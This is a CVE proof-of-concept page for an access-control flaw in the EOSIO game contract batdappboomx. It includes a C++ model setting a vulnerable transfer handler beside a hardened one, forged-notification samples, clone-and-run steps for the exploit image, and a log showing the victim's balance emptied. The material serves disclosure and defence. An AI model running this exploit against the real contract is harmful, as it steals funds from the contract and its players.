
CVE-2022-27134 PoC — batdappboomx security vulnerability

Associated Vulnerability
Title: batdappboomx security vulnerability (CVE-2022-27134)
Description: batdappboomx is a public smart contract. Version v327c04cf of batdappboomx contains a security vulnerability caused by an access-control problem in the smart contract's transfer function. A remote attacker can exploit it through the std::string memo parameter to win cryptocurrency without paying the ticket fee.
Description: CVE-2022-27134
Readme
## CVE ID
CVE-2022-27134

## PRODUCT
`batdappboomx` is a public smart contract running on the [EOSIO blockchain](https://eos.io/). It is a game contract: participants first pay cryptocurrency into it as a ticket, and it pays cryptocurrency back out to the winners.


## Version
The latest version of the contract deployed on-chain. Its code hash (the sha256 of the deployed WASM) is 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820.
Verify it on the block explorer at https://bloks.io/account/batdappboomx.

## PROBLEM TYPE 
access control vulnerability

## DESCRIPTION

`batdappboomx` is closed source; the vulnerability was found by analysing the deployed WASM with [WASAI](https://github.com/WASAIRepo/WASAI). The contract's `transfer` handler does not properly control who may enter the game, so an attacker can join through the `memo` parameter without paying the ticket fee and then collect the payout.
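The advisory says only that the contract's `transfer` handler has an access-control flaw reachable through the `memo` argument and that the attacker enters the game without paying the ticket; the contract is closed source, so the exact missing check is not on this page. The block below is an added example, not code from the `batdappboomx` contract or from the PoC repository: a dependency-free C++ model of an EOSIO game contract's transfer-notification handler, with a vulnerable variant that admits any caller whose memo parses, beside a hardened one that first verifies the notification was issued by `eosio.token`, that the contract is the recipient, that the token is `EOS`, and that the ticket fee is covered. The account names (including `batdappboomx` as the victim), the `game:<id>` memo format, the 1.0000 EOS ticket, and the `code` field standing in for `get_first_receiver()` are all assumptions of this example, and the constructed notifications stand in for on-chain transfer actions.

```cpp
// Added example: model of an EOSIO game contract's transfer-notification handler.
// Not the batdappboomx code (closed source); names, memo format and ticket are assumed.
#include <cstdint>
#include <iostream>
#include <map>
#include <string>

// Stand-in for eosio::asset: integer units with 4 decimals for EOS (1.0000 EOS = 10000).
struct Asset {
    int64_t amount;
    std::string symbol;
};

// Fields a transfer notification carries. "code" models eosio::get_first_receiver():
// the contract whose action triggered this notification.
struct TransferNotification {
    std::string code;
    std::string from;
    std::string to;
    Asset quantity;
    std::string memo;   // "game:<id>" selects the game to enter (constructed format)
};

class GameContract {
public:
    GameContract(std::string self, int64_t ticket) : self_(self), ticket_(ticket) {}

    // Vulnerable handler (hypothetical): trusts every notification that reaches it
    // and lets the memo alone decide the entry, so no real EOS ever has to arrive.
    bool join_vulnerable(const TransferNotification& n) {
        if (n.from == self_) return false;   // ignore our own outgoing payouts
        std::string game = game_from_memo(n.memo);
        if (game.empty()) return reject("malformed memo");
        players_[game] = n.from;
        last_reason_ = "admitted";
        return true;
    }

    // Hardened handler: validate where the transfer came from, who received it,
    // which token and how much, and only then parse the memo.
    bool join_hardened(const TransferNotification& n) {
        if (n.from == self_) return false;
        if (n.code != "eosio.token")     return reject("notification not from eosio.token");
        if (n.to != self_)               return reject("contract is not the recipient");
        if (n.quantity.symbol != "EOS")  return reject("wrong token symbol");
        if (n.quantity.amount < ticket_) return reject("ticket fee not paid");
        std::string game = game_from_memo(n.memo);
        if (game.empty())                return reject("malformed memo");
        players_[game] = n.from;
        last_reason_ = "admitted";
        return true;
    }

    const std::string& last_reason() const { return last_reason_; }

private:
    // Parses the constructed "game:<digits>" memo; empty string means malformed.
    static std::string game_from_memo(const std::string& memo) {
        const std::string prefix = "game:";
        if (memo.compare(0, prefix.size(), prefix) != 0) return "";
        std::string id = memo.substr(prefix.size());
        if (id.empty()) return "";
        for (char c : id) if (c < '0' || c > '9') return "";
        return id;
    }
    bool reject(const char* why) { last_reason_ = why; return false; }

    std::string self_;
    int64_t ticket_;
    std::map<std::string, std::string> players_;   // game id -> entrant
    std::string last_reason_;
};

// Constructed sample notifications (assumed account names, 12-char EOSIO style).
// Fake token: the attacker's own contract runs a "transfer" carrying symbol EOS.
TransferNotification forged_entry()    { return {"fakeeostoken", "attacker", "batdappboomx", {10000, "EOS"}, "game:17"}; }
// Real eosio.token transfer, but for less than the ticket.
TransferNotification underpaid_entry() { return {"eosio.token", "attacker", "batdappboomx", {5000, "EOS"}, "game:17"}; }
// Real eosio.token transfer between two attacker accounts, relayed to the game via require_recipient.
TransferNotification relayed_entry()   { return {"eosio.token", "attacker", "accomplice11", {10000, "EOS"}, "game:17"}; }
// Honest entry: 1.0000 EOS from eosio.token paid to the contract.
TransferNotification paid_entry()      { return {"eosio.token", "player", "batdappboomx", {10000, "EOS"}, "game:17"}; }

// Runs one notification through the chosen handler on a fresh contract instance.
bool admits(bool hardened, const TransferNotification& n) {
    GameContract g("batdappboomx", 10000);
    return hardened ? g.join_hardened(n) : g.join_vulnerable(n);
}

// Reason the hardened handler gives for its decision.
std::string hardened_reason(const TransferNotification& n) {
    GameContract g("batdappboomx", 10000);
    g.join_hardened(n);
    return g.last_reason();
}

int main() {
    const char* names[] = {"forged", "underpaid", "relayed", "paid"};
    TransferNotification cases[] = {forged_entry(), underpaid_entry(), relayed_entry(), paid_entry()};
    for (int i = 0; i < 4; ++i)
        std::cout << names[i] << ": vulnerable=" << admits(false, cases[i])
                  << " hardened=" << admits(true, cases[i])
                  << " (" << hardened_reason(cases[i]) << ")\n";
    return 0;
}
```

A real EOSIO contract would register the hardened handler with `[[eosio::on_notify("eosio.token::transfer")]]` and read `get_first_receiver()` and `get_self()` from the runtime; the notification struct here only makes those inputs explicit so the checks can be exercised offline. The `relayed_entry()` case covers the other classic bypass of this handler type: a genuine `eosio.token` transfer between two attacker accounts that reaches the game contract only through `require_recipient`, which the `to == self` check stops.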

1. Build and start the environment

```bash
# clone the PoC repository and build the image that carries the EOSIO tooling and the PoC
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomx
docker build -t localhost/client-eos:eos .
# run the PoC interactively with host networking
docker run --rm  --network host -it localhost/client-eos:eos
```

2. Attack the victim contract and take its cryptocurrency (`EOS`). Inside the container the PoC (`poc.py`) runs against a local EOSIO chain with the bundled victim contract and `eosio.token` deployed; the expected output is:

```bash
info  2022-03-11T14:28:53.345 keosd     wallet_plugin.cpp:38          plugin_initialize    ]
...
warn  2022-03-11T14:28:53.355 keosd     wallet.cpp:218                save_wallet_file     ] saving wallet to file /root/eosio-wallet/./default.wallet
Creating wallet: default
Save password to use in the future to unlock this wallet.
Without password imported keys will not be retrievable.
saving password to /root/passwd
imported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV
[+] victim's balance: 100.00 -> 0.00
[+] attacker's balance: 10000000.00 10000100.00

[+] Attacked successfully. Got more cryptocurrency.
```
File Snapshot

```text
[4.0K]  /data/pocs/62f4dbf2d8ccb639e0805b69c5f4c8ae38359899
├── [4.0K]  batdappboomx
│   ├── [2.7K]  batdappboomx.abi
│   └── [ 46K]  batdappboomx.wasm
├── [ 376]  Dockerfile
├── [4.0K]  eosio.token
│   ├── [ 564]  CMakeLists.txt
│   ├── [4.3K]  eosio.token.abi
│   ├── [ 17K]  eosio.token.wasm
│   ├── [4.0K]  include
│   │   └── [4.0K]  eosio.token
│   │       └── [7.0K]  eosio.token.hpp
│   ├── [4.0K]  ricardian
│   │   └── [3.6K]  eosio.token.contracts.md.in
│   └── [4.0K]  src
│       └── [5.3K]  eosio.token.cpp
├── [ 965]  genesis.json
├── [3.7K]  poc.py
└── [1.6K]  README.md

6 directories, 12 files
```